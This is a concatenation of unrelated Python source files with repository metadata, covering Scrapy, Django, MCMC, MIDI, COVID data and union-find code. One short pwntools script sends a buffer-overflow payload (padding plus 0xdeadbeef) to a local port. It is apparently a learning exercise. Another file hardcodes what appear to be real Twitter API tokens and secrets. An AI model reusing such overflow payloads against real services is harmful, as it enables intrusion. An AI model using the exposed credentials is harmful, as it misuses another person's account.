|
[
"marinuso@gmail.com"
] |
marinuso@gmail.com
|
5296914f31dfa648d606edcb432e60d48995d74f
|
e2bcf3a07829da38b494966c8392352f0f7c6ef6
|
/webcrawler/webcrawler/items.py
|
7345d1087cc1982f09ed9d716d2196705a7ccb44
|
[] |
no_license
|
abizerjafferjee/collegecondoalerts
|
d3875327b8b5d68c4c90bb9fb5fe7c5dad6a7ab7
|
f35324d0791c9198775b2d64eb0ef1767e3fa0be
|
refs/heads/master
| 2022-07-01T17:52:53.442506
| 2020-05-08T16:20:43
| 2020-05-08T16:20:43
| 260,981,659
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,255
|
py
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class WebcrawlerItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
pass
class Places4StudentsListingItem(scrapy.Item):
current_date = scrapy.Field()
college_name = scrapy.Field()
website = scrapy.Field()
url = scrapy.Field()
title = scrapy.Field()
address = scrapy.Field()
city = scrapy.Field()
province = scrapy.Field()
country = scrapy.Field()
postal_code = scrapy.Field()
type_of_accomodation = scrapy.Field()
rental_rate = scrapy.Field()
occupancy_date = scrapy.Field()
lease_types = scrapy.Field()
lease_conditions = scrapy.Field()
tenant_information_required = scrapy.Field()
num_washrooms = scrapy.Field()
rental_information = scrapy.Field()
occupied_by_landlord = scrapy.Field()
landlord_name = scrapy.Field()
landlord_telephone = scrapy.Field()
floor_plans = scrapy.Field()
distance = scrapy.Field()
listing_description = scrapy.Field()
utilities = scrapy.Field()
amenities = scrapy.Field()
image_links = scrapy.Field()
|
[
"abizerjafferjee@gmail.com"
] |
abizerjafferjee@gmail.com
|
ed3bb5fc994b6721597a9c7515168a964997ee84
|
1434aee6bf3beb1b36ecc010d8231e5d7c6f8b07
|
/01/dictionaries.py
|
89de86eec2f6e7bd6bf9cc3c1db4a619718eb682
|
[] |
no_license
|
elnazbkh/practice_python
|
5ddc9eb9389206be46b0fa79f8b327b6a418178c
|
a4ef032dc3a3e0803b9121d7fb975f066fc6e31e
|
refs/heads/master
| 2020-05-29T13:51:39.178216
| 2019-06-19T07:13:25
| 2019-06-19T07:13:25
| 189,176,036
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
#movie = ["sunlight", "woody allen", 2009,"yes", "no"]
movie ={"title":"sunlight", "director": "woody allen", "year": 2009, "answer": "yes"}
print(movie["title"])
#print(movie.clear())
print(movie.values())
print(movie.__len__())
print(movie.get("name"))
movie.update({"a": 1235, "b":585})
print(movie)
print(movie.get("writer", "unknown"))
print(movie.keys())
print(list(movie.keys()))
|
[
"elnaz.bakhtiari20@gmail.com"
] |
elnaz.bakhtiari20@gmail.com
|
aebafca48460fe335d6d580a522270231e3bb2af
|
3bb70650b4b83e4653dcc18c8233c106c7a5611a
|
/payment_type/views.py
|
208424481df08a022dc05541b289d53b7e328f55
|
[] |
no_license
|
khanhlu2013/pos_connect_code
|
48e736a6b1c5ca6a5c4ff39d842d8a93f66e67ef
|
fdf70de858c10b175832af31ecc0cf770d028396
|
refs/heads/master
| 2023-04-08T02:35:46.181265
| 2016-10-18T21:12:51
| 2016-10-18T21:12:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,952
|
py
|
from payment_type.models import Payment_type
from payment_type.payment_type_serializer import Payment_type_serializer
from django.http import HttpResponse
from django.core.serializers.json import DjangoJSONEncoder
import json
def payment_type_insert_view(request):
pt = json.loads(request.POST['pt'])
cur_login_store = request.session.get('cur_login_store')
pt = Payment_type.objects.create(name=pt['name'],sort=pt['sort'],store_id=cur_login_store.id,active=pt['active'])
pt_serialized = Payment_type_serializer(pt).data
return HttpResponse(json.dumps(pt_serialized,cls=DjangoJSONEncoder), mimetype='application/json')
def payment_type_update_angular_view(request):
pt_json = json.loads(request.POST['pt'])
cur_login_store = request.session.get('cur_login_store')
pt = Payment_type.objects.get(pk=pt_json['id'],store_id = cur_login_store.id)
pt.name = pt_json['name']
pt.sort = pt_json['sort']
pt.active = pt_json['active']
pt.save()
pt_serialized = Payment_type_serializer(pt).data
return HttpResponse(json.dumps(pt_serialized,cls=DjangoJSONEncoder), mimetype='application/json')
def payment_type_delete_view(request):
id = request.POST['id']
cur_login_store = request.session.get('cur_login_store')
pt = Payment_type.objects.get(pk=id,store_id=cur_login_store.id);
pt.delete();
pt_lst = Payment_type.objects.filter(store_id=cur_login_store.id)
pt_lst_serialized = Payment_type_serializer(pt_lst,many=True).data
return HttpResponse(json.dumps(pt_lst_serialized,cls=DjangoJSONEncoder), mimetype='application/json')
def payment_type_get_view(request):
cur_login_store = request.session.get('cur_login_store')
pt_lst = Payment_type.objects.filter(store_id=cur_login_store.id)
pt_lst_serialized = Payment_type_serializer(pt_lst,many=True).data
return HttpResponse(json.dumps(pt_lst_serialized,cls=DjangoJSONEncoder), mimetype='application/json')
|
[
"khanhlu2013@gmail.com"
] |
khanhlu2013@gmail.com
|
3200279fcdb8a3178f8a843db5bccc368278b969
|
decdfe51291044e66c9fdaa4c7f1bc469d2627cd
|
/example/threshold_calcs.py
|
675ad6963d5ffbe3cefeffca71dd797d995b48b0
|
[] |
no_license
|
tomclose/mcmc_code
|
011435d191cbbf4635e493181283a3cb96bbf4c9
|
c3efde48e33c92564f3e8bd8a26e3820fb2649fe
|
refs/heads/master
| 2018-12-28T05:58:24.065898
| 2013-04-03T13:59:50
| 2013-04-03T13:59:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,620
|
py
|
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'lib'))
import numpy as np
import state as st
import chain as ch
import getopt
def run_trials(size=6, prob=0.1, n_steps = 5000, n_trials = 1000, verbose=True):
successes = failures = 0
for i in range(n_trials):
s_orig = st.UniformToricState(size, prob)
s_orig.generate_errors()
synd = s_orig.syndrome()
# assume that logical horizontal/vertical errors
# are independent ??, so that the overall threshold
# is just the threshold for correcting one sort
# of error
vert_z = s_orig.VERT_Z
vert_x = s_orig.VERT_X
# forget the original error confic
s = st.UniformToricState.from_syndrome(size, prob, synd)
conj_class = st.UniformToricState.compare(s, s_orig)
# project onto the vertical error classes
vert_class = conj_class & (vert_z + vert_x)
p1 = ch.path(s.copy().change_class(vert_class)) # the right one
p2 = ch.path(s.copy().change_class(vert_z ^ vert_class)) # with
p3 = ch.path(s.copy().change_class(vert_x ^ vert_class)) # with
p4 = ch.path(s.copy().change_class((vert_x + vert_z) ^ vert_class)) # with
paths = [p1, p2, p3, p4]
ps = ch.path_set(*[ch.in_jumps_of(n_steps/2, ch.average_err(p)) for p in paths])
# take two steps, so that the average is found
# over the second half of the chain
ps.next()
res = ps.next()
totals = [n for (n, prop, count) in res]
if np.argmin(totals) == 0:
successes +=1
if verbose:
print("success")
else:
failures +=1
if verbose:
print("fail")
return (successes, failures)
if __name__ == "__main__":
try:
opts, args = getopt.getopt(sys.argv[1:], "s:n:p:L:v", ["steps=", "n_trials="])
except getopt.GetoptError:
usage = """
Useage:
python threshold_calcs.py -L 6 -p 0.3 --steps 1000 --n_trials 50
"""
print(usage)
sys.exit(2)
# defaults:
size, p, steps, n_trials, verbose = 6, 0.1, 1000, 20, False
# from options:
for opt, arg in opts:
if opt=="-L":
size = int(arg)
elif opt in ("-s", "--steps"):
steps = int(arg)
elif opt in ("-n", "--n_trials"):
n_trials = int(arg)
elif opt=="-p":
p = float(arg)
print(p)
elif opt == "-v":
verbose = True
print(run_trials(size, p, steps, n_trials, verbose=verbose))
|
[
"tom.close@cantab.net"
] |
tom.close@cantab.net
|
815be0e05f4238e38eed2ee4c71197dfb56b19a6
|
a498ca05c3c02a94713f8396a92ce3b979aef0cf
|
/DRF/src/libraryrest/views.py
|
938bcd888019086ef86d2f9657483af070fdbfe3
|
[] |
no_license
|
Sherlock5000/fullstack-toy-project
|
4404870366441dc35d2812d5ed9b373dd891b26f
|
5e559db07017a8c1e0bd11e459e14a27149ab2c4
|
refs/heads/main
| 2023-07-04T21:40:05.107701
| 2023-06-26T16:59:53
| 2023-06-26T16:59:53
| 386,567,491
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,284
|
py
|
# from django.shortcuts import render
from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework import viewsets
from libraryrest.models import Customer, Order, Product, Tag
from libraryrest.serializers import CustomerSerializer, OrderSerializer,\
ProductSerializer, TagSerializer
# Create your views here.
class CustomerViewSet(viewsets.ModelViewSet):
serializer_class = CustomerSerializer
queryset = Customer.objects.all()
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
class TagViewSet(viewsets.ModelViewSet):
serializer_class = TagSerializer
queryset = Tag.objects.all()
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
class ProductViewSet(viewsets.ModelViewSet):
serializer_class = ProductSerializer
queryset = Product.objects.all()
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
class OrderViewSet(viewsets.ModelViewSet):
serializer_class = OrderSerializer
queryset = Order.objects.all()
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
|
[
"anirban.das.16@mountblue.tech"
] |
anirban.das.16@mountblue.tech
|
882afb6438c7ec619724f5a3cc536e0417024e12
|
19181c269e51e381417dec4e2a0ac9ba06589efe
|
/Floppotron/Wii Shop.py
|
d3abb6918a4d2f1843864fad0ebd18bc6fd6fa41
|
[] |
no_license
|
SamueldSun/Floppotron
|
9bf2fd8c77efebc061ff506f0d761412d3999f82
|
f7a61c2bf3ae5940d5b4e09c33312dc7fda3fa12
|
refs/heads/master
| 2020-04-11T18:49:04.404170
| 2018-12-16T15:09:07
| 2018-12-16T15:09:07
| 162,012,564
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,723
|
py
|
hertz = [0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
31,
33,
35,
37,
39,
41,
44,
46,
49,
52,
55,
58,
62,
65,
69,
73,
78,
82,
87,
93,
98,
104,
110,
117,
123,
131,
139,
147,
156,
165,
175,
185,
196,
208,
220,
233,
247,
262,
277,
294,
311,
330,
349,
370,
392,
415,
440,
466,
494,
523,
554,
587,
622,
659,
698,
740,
784,
831,
880,
932,
988,
1047,
1109,
1175,
1245,
1319,
1397,
1480,
1568,
1661,
1760,
1865,
1976,
2093,
2217,
2349,
2489]
# Import stuff
from mido import MidiFile
import time
import serial
# Changing variables
ser = serial.Serial('COM4')
midiFile = 'Wii Channels - Mii Channel.mid'
# Other startup stuff
send = "\n"
time.sleep(3)
# Sends code to Arduino
def sendLine(code):
print(int(code))
ser.write(code.encode())
ser.write(send.encode())
# Opens and reads Midi file
for msg in MidiFile(midiFile):
time.sleep(msg.time)
if not msg.is_meta:
data = str(msg)
# Filters out other initializing stuff
if data[0:4] == "note":
# If drive should turn on
if data[6:7] == "n":
if data[16] == "1":
code = ("3" + str(hertz[int(data[23:25])]) + "1")
sendLine(code)
else:
code = ("2" + str(hertz[int(data[23:25])]) + "1")
sendLine(code)
# If drive should turn off
elif data[6:7] == "f":
if data[17] == "1":
code = "30"
sendLine(code)
else:
code = "20"
sendLine(code)
# Else
else:
print("ERROR")
|
[
"noreply@github.com"
] |
SamueldSun.noreply@github.com
|
8479e2bf35b03e205eaeaef0584246e9b2d39146
|
cac694ea9a7f0cc918d9a3c91a76111657df8af6
|
/pwn_network.py
|
ac2d102e2fd9cec857cc91a37a916204e8ae81e4
|
[] |
no_license
|
NavKang/IntroToPwntools
|
c234936b50c9755a9ce1e15b65ba2807654a97f5
|
83c260795e26a8717814669887a84eb246aeae7f
|
refs/heads/main
| 2023-05-25T09:55:47.477011
| 2021-06-10T15:54:53
| 2021-06-10T15:54:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 173
|
py
|
from pwn import *
connect = remote('127.0.0.1', 1337)
print(connect.recvn(18))
payload = "A"*32
payload += p32(0xdeadbeef)
connect.send(payload)
print(connect.recvn(34))
|
[
"noreply@github.com"
] |
NavKang.noreply@github.com
|
835e7636670509badbc31c10b573de3732f0f7e5
|
5fd76ed8167e4259524e2fddfaca3945de0a2e90
|
/covid19/covid19.py
|
904eeefa270dbbde4c8b9be90824079c69b926f3
|
[] |
no_license
|
davidjdclarke/scripts
|
87f71efadbfc873066541a23bc29f8d4044607aa
|
acea0b687b2b096e5781ed3fda7d5462d0381082
|
refs/heads/master
| 2023-04-28T12:35:33.239034
| 2021-05-20T21:54:17
| 2021-05-20T21:54:17
| 334,979,491
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,592
|
py
|
import pandas as pd
from matplotlib import pyplot as plt
def get_all_cases(data):
data_keys = []
for i in range(len(data)):
if data[i] not in data_keys:
data_keys.append(data[i])
return data_keys
def percentage(death_numbers, prints=True):
percent = (death_numbers['deaths'] / death_numbers['cases']) * 100
if prints:
print('Age Range: ' + str(age))
print('Death Percentage: ' + str(percent) + '%')
return percent
def numbers_by_range(age_range=0, print_statement=False):
num_deaths = 0
num_survivals = 0
total = 0
if age_range == 0:
age_range = ['40s']
for i in range(len(df["Age_Group"])):
if df["Outcome1"][i] == 'Resolved' and df['Age_Group'][i] in age_range:
num_survivals += 1
total += 1
elif df["Outcome1"][i] == 'Fatal' and df['Age_Group'][i] in age_range:
num_deaths += 1
total += 1
if print_statement:
print("Age Range: " + str(age_range))
print('Total Cases: ' + str(total))
print('Survived: ' + str(num_survivals))
print('Deaths: ' + str(num_deaths))
return {'deaths': num_deaths, 'cases': total, 'survivals': num_survivals, 'age_range': age_range}
def temp(df):
dates = get_all_cases(df['Accurate_Episode_Date'])
num_entries = len(dates)
num_cases = len(df['Accurate_Episode_Date'])
data = {'active_cases': [0]*num_entries, 'deaths': [], 'recoveries': [], 'total_deaths': [],
'total_recoveries': [], 'total_cases': [], 'date': dates}
active_id = []
index = 0
num_entries = len(df['Accurate_Episode_Date'])
for i in range(len(data['date'])):
if i > 0:
data['active_cases'][i] = data['active_cases'][i-1]
for j in range(num_cases):
if df['Accurate_Episode_Date'][j] == data['date'][i]:
data['active_cases'][i] += 1
index += 1
print(index)
for case_id in active_id:
if df['Test_Reported_Date'][case_id] == data['date'][i]:
pass
# data['active_cases'][i] -= 1
return data
if __name__ == "__main__":
df = pd.read_csv('conposcovidloc.csv')
age_ranges = ['<20', '20s', '30s', '40s', '50s', '60s', '70s', '80s', '90s']
data = {}
'''for age in age_ranges:
data[age] = numbers_by_range([age])
percentage(data[age])
data['total'] = numbers_by_range(age_ranges)'''
'''info = df['Case_AcquisitionInfo']
x = get_all_cases(info)'''
x = temp(df)
|
[
"david.j.d.clarke@gmail.com"
] |
david.j.d.clarke@gmail.com
|
dcdc5eecf195e5435e2bd88a76d23087aa1ad8d9
|
04dcfaf382f90a7e6aee8f607f0379babb83e048
|
/twitterhw3b.py
|
1c0c14a32b597dc12a01bc895281c33bdf065784
|
[] |
no_license
|
malayshawhite2012/hw3
|
d2b152f7edbbfbf01d9832131e9e9a56a439d483
|
2d5629714c425b55487b5277143ec7d6d097367e
|
refs/heads/master
| 2021-01-11T07:35:06.998768
| 2016-11-15T01:59:50
| 2016-11-15T01:59:50
| 72,865,221
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,124
|
py
|
# In this assignment you must do a Twitter search on any term
# of your choice.
# Deliverables:
# 1) Print each tweet
# 2) Print the average subjectivity of the results
# 3) Print the average polarity of the results
# Be prepared to change the search term during demo.
import tweepy
from textblob import TextBlob
access_token = "784881409521508352-gq69a9kmOLNUwqEBudGxg31j5hj79DA"
access_token_secret = "9LjMj0AflSe1LTJ5IPK5Qs56jQSZSuJKFeAXbh8QlMRar"
consumer_key = "8n7r008VE7xn1IdUWl0rmDMsk"
consumer_secret = "YGDQT0DB4e75wTg99GRo5oIv1SpYNThM99jRepDReJFAtMOENP"
auth = tweepy.OAuthHandler(consumer_key,consumer_secret)
auth.set_access_token(access_token,access_token_secret)
api = tweepy.API(auth)
search_for_tweets = api.search('Hilary Clinton')
subjectivity = 0
polarity = 0
count = 0
for tweet in search_for_tweets:
print(tweet.text)
count += 1
analysis = TextBlob(tweet.text)
subjectivity += analysis.sentiment.subjectivity
polarity += analysis.sentiment.polarity
print("\n")
print("The average subjectivity is " + str(subjectivity/count))
print("The average polarity is " + str(polarity/count))
|
[
"dajour@umich.edu"
] |
dajour@umich.edu
|
c71310117d5a77f30939815439c12d298add4716
|
a429fc499f463d2aa3390174f5db03928c7a7334
|
/account/migrations/0003_auto_20191009_1412.py
|
c25d4aeb4b3376fe3a1945762a60c5a742454e05
|
[] |
no_license
|
Junseok0211/FootballLover
|
29c4a3dd1a78a5d7d27d53bb318b3dc787d42c2f
|
817f7ea556dfa6a659cb7ebcd27f9e8c7aa35900
|
refs/heads/master
| 2022-12-10T02:28:32.800467
| 2020-04-28T17:09:25
| 2020-04-28T17:09:25
| 220,898,295
| 0
| 1
| null | 2022-12-08T06:15:27
| 2019-11-11T04:04:02
|
HTML
|
UTF-8
|
Python
| false
| false
| 406
|
py
|
# Generated by Django 2.1.8 on 2019-10-09 14:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('account', '0002_fnsuser_teamname'),
]
operations = [
migrations.AlterField(
model_name='fnsuser',
name='name',
field=models.CharField(max_length=15, verbose_name='이름'),
),
]
|
[
"didwnstjr777@gmail.com"
] |
didwnstjr777@gmail.com
|
5386ed8a053aad896554efa4ec0fe332d49a55dd
|
e27295381be2b8d3bde601aea4954fa931c95176
|
/lesson4/monkey/hw/system.py
|
141dc4d05ff61e108a03afba213e4ecddff35f9a
|
[
"MIT"
] |
permissive
|
cnjllin/actual-16-homework
|
cd20f951ceaf956ead221ef5f756a0914b16cd8e
|
c4937af205dd7cee3ee39223f8b9271059e72d7e
|
refs/heads/master
| 2020-03-17T18:40:17.191245
| 2017-12-10T04:51:11
| 2017-12-10T04:51:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,063
|
py
|
#!coding: utf-8
import sys
import json
personinfos = []
def login(*args, **kwargs):
username = raw_input('Username: ')
password = raw_input('Password: ')
# check failed count; failed_count >= 3
if check_failed_count(username):
print 'disable username:%s login reboot system, failed count more than 3.' % username
return
# check username and password is ok
auth_result, ok = authentication(username, password)
if ok:
print "username:%s login sucess." % username
print '''
Welcome to reboot system.
'''
else:
add_failed_counter(username)
print "username:%s login failed, info:%s." % (username, auth_result)
def register(*args, **kwargs):
print '\n\tCreate your personal account\n'
username = raw_input('Username: ')
email = raw_input('Email Address: ')
password = raw_input('Password: ')
if check_user_exists(username):
print 'username : %s already exists.' % username, False
registerInfo = {'username' : username, 'email' : email, 'password' : password, 'failed_count' : 0}
personinfos.append(registerInfo)
print 'account %s is created sucess' % username, True
def add_failed_counter(username):
global personinfos
ret = []
for x in personinfos:
if x['username'] == username:
x['failed_count'] += 1
ret.append(x)
personinfos = ret
def check_failed_count(username):
map_user_failed_dic = { x['username'] : x['failed_count'] for x in personinfos if x }
if map_user_failed_dic[username] >= 3:
return True
return False
def save(*args, **kwargs):
try:
fd = open(args[0], 'w')
except Exception as e:
print "save data to file failed, info:%s." % e.args
else:
data = json.dumps(personinfos)
fd.write(data)
print "save data to file sucess."
finally:
fd.close()
def load(*args, **kwargs):
global personinfos
try:
fd = open(args[0], 'r')
except Exception as e:
print "load data to mem failed, info:%s" % e.args
return
else:
data = fd.read()
personinfos = json.loads(data)
print "load data to mem sucess."
fd.close()
def printFormat(*args, **kwargs):
if len(args) >= 1:
format = args[0]
else:
format = None
if format == "json":
print json.dumps(personinfos, indent=4)
elif format == "xml":
pass
elif format == "table":
'''
username | email | password | failed_count
monkey | monkey@51reboot.com | 123456 | 0
xiaoming | xiaoming@51reboot.com | 123456 | 0
'''
print "%-10s | %-24s | %-8s | %-8s" % ("username", 'email', 'password', 'failed_count')
for x in personinfos:
if not x:
continue
print "%-10s | %-24s | %-8s | %-8s" % (x['username'], x['email'], x['password'], x['failed_count'])
print "\n"
else:
print personinfos
def check_user_exists(username):
'''
user exists : return True
user not exists : return False
'''
usernames = [ x['username'] for x in personinfos if x ]
if username is usernames:
return True
else:
return False
def authentication(*args, **kwargs):
'''
如果用户名和密码验证成功 return True 否则 return False
'''
map_user_pass_dic = { x['username'] : x['password'] for x in personinfos if x }
if map_user_pass_dic.get(args[0], None) == args[1]:
return 'login sucess.', True
else:
return 'bad password.', False
def help(*args, **kwargs):
docstring = '''
[[ reboot actual-16 ]]
login : login reboot system.
register : register account to reboot's system.
exit : exit reboot's system.
help : Print help info and exit successfully.
list : format account info.
exit : exit current program.
save : save data to file.
load : load data to mem.
'''
print docstring
def process_action(action):
action_slice = action.strip().split()
if len(action_slice) == 0:
action, args = '', ()
elif len(action_slice) >= 1:
action, args = action_slice[0] , action_slice[1:]
else:
action, args = action_slice[0] , ()
return action, args
def exit(*args, **kwargs):
sys.exit(0)
def main():
actionMap = {
'login' : login,
'register' : register,
'help' : help,
'exit' : exit,
'list' : printFormat,
'load' : load,
'save' : save,
}
help()
while True:
action = raw_input("please input your action: ")
action, args = process_action(action)
try:
actionMap[action](*args)
except Exception as e:
pass
if __name__ == '__main__':
main()
|
[
"zhengyscn@gmail.com"
] |
zhengyscn@gmail.com
|
6ec929b5a098d1c3ed743eca5d3183070a766f35
|
a8aa6570ad116f0ab6b059c4e2b68def88a47837
|
/Restaurants/restaurant_website/urls.py
|
5eff369a4f7569a6257bd7929ed83b2e854ba80d
|
[] |
no_license
|
omkumbhar/Restaurants
|
59eb9bd53a2061109119d5f7e224d4a02ee9ccb9
|
a1b1311de4e214b5dafedb7354a0700f436444d0
|
refs/heads/master
| 2022-04-23T14:45:47.584102
| 2020-04-24T17:16:31
| 2020-04-24T17:16:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 264
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name = 'restaurant-home' ),
path('about/', views.about , name = 'restaurant-about' ),
#testing
path('login2/', views.login , name = 'restaurant-login' ),
]
|
[
"om.kumbhar1998@gmail.com"
] |
om.kumbhar1998@gmail.com
|
a61cc96f66da89971df0b310fea5e1c4c77d0380
|
0db97db08743783019efe022190f409d22ff95bd
|
/aliyun/api/rest/Mts20140618QuerySnapshotJobListRequest.py
|
a8644f1e42038e7be4e63081c0410bf482cc2082
|
[
"Apache-2.0"
] |
permissive
|
snowyxx/aliyun-python-demo
|
8052e2a165f1b869affe632dda484d6ca203bd9b
|
ed40887ddff440b85b77f9b2a1fcda11cca55c8b
|
refs/heads/master
| 2021-01-10T03:37:31.657793
| 2016-01-21T02:03:14
| 2016-01-21T02:03:14
| 49,921,095
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
'''
Created by auto_sdk on 2015.09.22
'''
from aliyun.api.base import RestApi
class Mts20140618QuerySnapshotJobListRequest(RestApi):
def __init__(self,domain='mts.aliyuncs.com',port=80):
RestApi.__init__(self,domain, port)
self.SnapshotJobIds = None
def getapiname(self):
return 'mts.aliyuncs.com.QuerySnapshotJobList.2014-06-18'
|
[
"snowyxx@126.com"
] |
snowyxx@126.com
|
5c53baa76533a72c959d0164d038264dfa51729c
|
c91df3a07cc5cbf9a6a226d52173594de197e074
|
/enemy.py
|
a58333b108bb7ceef5b8b89f8a9460d3ecbbfde2
|
[] |
no_license
|
devu1999/mario-game
|
073e7cd15b6ae5940f77617174e504466754f6e7
|
824d62ae519d500fa6dbd6f0a06b19ae17caa6b1
|
refs/heads/master
| 2020-03-27T21:16:06.318149
| 2018-09-02T23:40:51
| 2018-09-02T23:40:51
| 147,129,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,950
|
py
|
import random
import sys,os
class enemy():
def __init__(self,obj):
self.x = 18
self.y = random.randint(10,75)
self.direction = 'R'
self.char = []
while( obj.Gamepad[self.x][self.y] != " " and obj.Gamepad[self.x + 1][self.y] != " "):
self.y = random.randint(0,75)
def Build(self,obj,Mario):
self.char = ["0","|","/","\\"]
for i in range(0,len(self.char)):
self.char[i] = "\033[37m" + str(self.char[i]) + "\033[0m"
if(obj.Gamepad[self.x][self.y] == self.char[i]):
Mario.clearplayer(obj.Gamepad)
return -1;
obj.Gamepad[self.x][self.y] = "^"
obj.Gamepad[self.x + 1][self.y] = "T"
return 1
def clearenemy(self,obj):
obj.Gamepad[self.x][self.y] = " "
obj.Gamepad[self.x + 1][self.y] = " "
def updatepos(self,obj):
if(self.direction == "R"):
if(obj.Gamepad[self.x][self.y + 1] != "\033[41;31m#\033[0m" and self.y <= 77):
self.y += 1
else:
self.direction = "L"
if(obj.Gamepad[self.x][self.y + 1] == "*"):
return -1
else:
if(obj.Gamepad[self.x][self.y - 1] != "\033[41;31m#\033[0m" and self.y >=1):
self.y -= 1
else:
self.direction = "R"
if(obj.Gamepad[self.x][self.y - 1] == "*"):
return -1
return 1
def collision(self,Mario):
if(Mario.headx - self.x < -1 and self.y >= Mario.heady - 1 and self.y <= Mario.heady + 1):
return -1;
return 1;
|
[
"devg1102@gmail.com"
] |
devg1102@gmail.com
|
139ce554357157ee605910b67a1ad2c43e74add6
|
d820c8efb25c9adb77015650a0f7dc6f1e983bfe
|
/abc/abc218_e.py
|
fcfc866e2728f903df05115cd96db8e7ca1c1c25
|
[] |
no_license
|
toshikish/atcoder
|
73fdaa2310f23f846279f9f7466bdb969448371f
|
33676630d6820dd92ccf0931425b8906b065bedd
|
refs/heads/master
| 2022-05-16T20:00:52.665762
| 2022-04-02T11:55:44
| 2022-04-02T11:55:44
| 173,099,510
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 863
|
py
|
N, M = map(int, input().split())
E = []
for _ in range(M):
Ai, Bi, Ci = map(int, input().split())
Ai -= 1
Bi -= 1
E.append((Ci, Ai, Bi))
E.sort()
class DisjointSet():
def __init__(self, n):
self.parent = list(range(n))
self.rank = [1] * n
def find(self, x):
if self.parent[x] == x:
return x
else:
self.parent[x] = self.find(self.parent[x])
return self.parent[x]
def unite(self, x, y):
x = self.find(x)
y = self.find(y)
if x == y:
return
if self.rank[x] > self.rank[y]:
x, y = y, x
self.parent[x] = y
self.rank[y] += self.rank[x]
ds = DisjointSet(N)
ans = 0
for ci, ai, bi in E:
if ds.find(ai) == ds.find(bi):
ans += max(ci, 0)
continue
ds.unite(ai, bi)
print(ans)
|
[
"toshiki@nanshika.com"
] |
toshiki@nanshika.com
|
d6df1d5232d2d55d87f21593517e5c6ff70ff91f
|
6ba163412b7868bbb5c872caf6172b44d1acf24e
|
/withPython_ch3.2_Matplotlib/3_8_plt_imshow.py
|
c8f173e79d1148925da8bd3ca08b6c69d1ea51b1
|
[] |
no_license
|
sejhig2/openCV_practice_StepByStep
|
6d6a238dcb389a89f68daa9b4f545f7021cb8170
|
5ad64a18cdf3202a2e4e060d5158dbef41927b64
|
refs/heads/main
| 2023-03-16T12:15:59.352848
| 2021-03-04T06:27:57
| 2021-03-04T06:27:57
| 343,457,609
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 195
|
py
|
import cv2
import matplotlib.pyplot as plt
img = cv2.imread("../python_openCV/img/girl.jpg")
plt.imshow(img)
plt.show()
# BGR 순서라서 색상이 좀 이상한다
# BGR -> RGB [:,:,::-1]
|
[
"sejhig2@gmail.com"
] |
sejhig2@gmail.com
|
927571f2a97f9ca7dddd4aff0afa491e1db4f25a
|
e45f2c8e8327ca184c86f971df5a7792e75a26ed
|
/MobileShop/mobilestore/migrations/0001_initial.py
|
c892c96c4fc87fdc395f6575d3aa13e360caabbb
|
[] |
no_license
|
Shrayas1497/django
|
06bec848a80559b8e598bce23397e2603b0c7959
|
98a3ca5842877a3a433c63f4599a59a11f7dde4e
|
refs/heads/master
| 2020-06-19T20:06:49.337486
| 2019-07-14T15:49:17
| 2019-07-14T15:49:17
| 196,853,473
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 771
|
py
|
# Generated by Django 2.1.5 on 2019-02-16 09:13
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Mobile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Model_Name', models.CharField(max_length=50)),
('Image', models.ImageField(upload_to='mobileImage')),
('Brand', models.CharField(max_length=50)),
('Price', models.IntegerField()),
('Face_recognition', models.BooleanField(default=False)),
],
),
]
|
[
"noreply@github.com"
] |
Shrayas1497.noreply@github.com
|
7c49c89d993e3bd614c5f79f232e45bc260b47e1
|
84f073856c8665b0f8b813a46a38f96ccd4f2790
|
/object_detection/models/ssd_mobilenet_v1_ppn_feature_extractor.py
|
258fb41347df9a887a373e84f08bfa886938e62a
|
[] |
no_license
|
fengrk/ml_tools
|
ad9336e47447e9a0f63ba7fc2e86c7eea51c955e
|
70e634250455ff6f3aeb826e781b8096adbdc066
|
refs/heads/master
| 2023-07-19T15:34:46.780323
| 2019-03-02T03:59:53
| 2019-03-02T03:59:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,304
|
py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
